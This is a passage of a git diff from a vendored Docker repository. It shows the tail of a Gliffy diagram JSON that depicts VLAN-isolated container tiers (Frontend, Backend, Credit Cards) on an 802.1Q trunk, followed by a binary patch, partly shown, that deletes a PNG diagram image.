VLAN/</span><span style=\"\">subnet</span></p><p style=\"text-align:center;\"><span style=\"text-decoration:none;\">&nbsp;</span></p><p style=\"text-align:center;\"></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":330,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":59,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#ff9900","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":279.0,"y":129.01008788486848,"rotation":0.0,"id":440,"width":5.0,"height":227.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":49,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#ff9900","fillColor":"#ff9900","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[4.000000000000057,-25.08952732449731],[4.000000000000114,176.01117206537933]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":56.0,"y":503.0913886978766,"rotation":0.0,"id":386,"width":135.0,"height":20.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":48,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">Frontend</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.0,"y":420.0100878848684,"rotation":0.0,"id":381,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":41,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":382,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":383,"width":98.00597014925374,"height":44.0,"uid":null,"order":47,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Container(s)</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">Eth0 <span style=\"font-weight:bold;\">10.1.10.0/24</span></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":384,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":385,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":40,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":382.0,"y":420.0100878848684,"rotation":0.0,"id":376,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":31,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":377,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":378,"width":98.00597014925374,"height":44.0,"uid":null,"order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Container(s)</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">Eth0 <span style=\"font-weight:bold;\">10.1.30.0/24</span></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":379,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":32,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":380,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":214.0,"y":503.0100878848685,"rotation":0.0,"id":374,"width":135.0,"height":20.162601626016258,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">Backend</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":376.0,"y":502.0100878848684,"rotation":0.0,"id":373,"width":135.0,"height":20.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":26,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">Credit Cards</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":627.0,"y":99.94304076572786,"rotation":0.0,"id":364,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":25,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":363,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":342,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-183.0,310.0670471191406],[-183.0,292.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":372.0,"y":410.0100878848684,"rotation":0.0,"id":363,"width":144.0,"height":117.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#eb6c6c","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":218.0,"y":341.5100878848684,"rotation":0.0,"id":366,"width":132.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">Parent: <span style=\"font-weight:bold;\">eth0.20</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">VLAN ID: <span style=\"font-weight:bold;\">20</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":297.0,"y":89.94304076572786,"rotation":0.0,"id":356,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":22,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":353,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":343,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-13.0,320.0670471191406],[-13.0,302.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":222.0,"y":420.0100878848684,"rotation":0.0,"id":348,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":21,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":349,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":17,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":350,"width":98.00597014925374,"height":44.0,"uid":null,"order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Container(s)</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">Eth0 <span style=\"font-weight:bold;\">10.1.20.0/24</span></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":351,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":352,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":13,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":212.0,"y":410.0100878848684,"rotation":0.0,"id":353,"width":144.0,"height":119.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#fca13f","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":212.0,"y":332.0100878848684,"rotation":0.0,"id":343,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#fca13f","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":203.0,"y":307.5100878848684,"rotation":0.0,"id":333,"width":160.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":9,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:20px;font-family:Arial;\"><span style=\"font-weight:bold;\">eth0</span>&nbsp;Interface</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":303.0,"y":240.51008788486845,"rotation":0.0,"id":323,"width":261.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":8,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;font-weight:bold;font-family:Arial;\">802.1Q Trunk - </span><span style=\"font-size:14px;font-family:Arial;\"><span style=\"font-style:italic;\">can be a single Ethernet link or Multiple Bonded Ethernet links</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.0,"y":291.0100878848684,"rotation":0.0,"id":290,"width":497.0,"height":80.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":543.5100878848684,"rotation":0.0,"id":282,"width":569.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":6,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;\"><span style=\"font-weight:bold;\">Docker Host</span></span><span style=\"font-size:14px;font-style:italic;\">: Frontend, Backend &amp; Credit Card App Tiers are&nbsp;<span style=\"font-weight:bold;\">Isolated</span></span><span style=\"font-size:14px;\">&nbsp;but can still communicate inside <span style=\"font-weight:bold;\">parent</span> interface or any other Docker hosts using the <span style=\"font-weight:bold;\">VLAN ID</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":-33.0,"y":79.94304076572786,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":5,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":345,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":340,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[157.0,330.0670471191406],[157.0,312.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":52.0,"y":410.0100878848684,"rotation":0.0,"id":345,"width":144.0,"height":119.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":4,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#5fcc5a","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":323.0100878848684,"rotation":0.0,"id":276,"width":531.0,"height":259.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":3,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":19.609892022503004,"y":20.27621073737908,"rotation":355.62347411485274,"id":246,"width":540.0106597126834,"height":225.00000000000003,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":2,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":1.0,"y":99.94304076572786,"rotation":0.0,"id":394,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":3.0,"strokeColor":"#666666","fillColor":"#999999","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[261.0,233.5670471191406],[261.0,108.05111187584177]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":44.0,"y":90.94304076572786,"rotation":0.0,"id":481,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":0,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":3.0,"strokeColor":"#666666","fillColor":"#999999","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[261.0,233.56704711914062],[261.0,108.05111187584174]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":104}],"shapeStyles":{},"lineStyles":{"global":{"fill":"#999999","stroke":"#38761d","strokeWidth":3,"dashStyle":"1.0,1.0","orthoMode":2}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"14px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458117295143,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}}
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.png b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.png
deleted file mode 100644
index 32d95f600e1d0f028e5a354584d7b3eac1639e35..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 38837
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
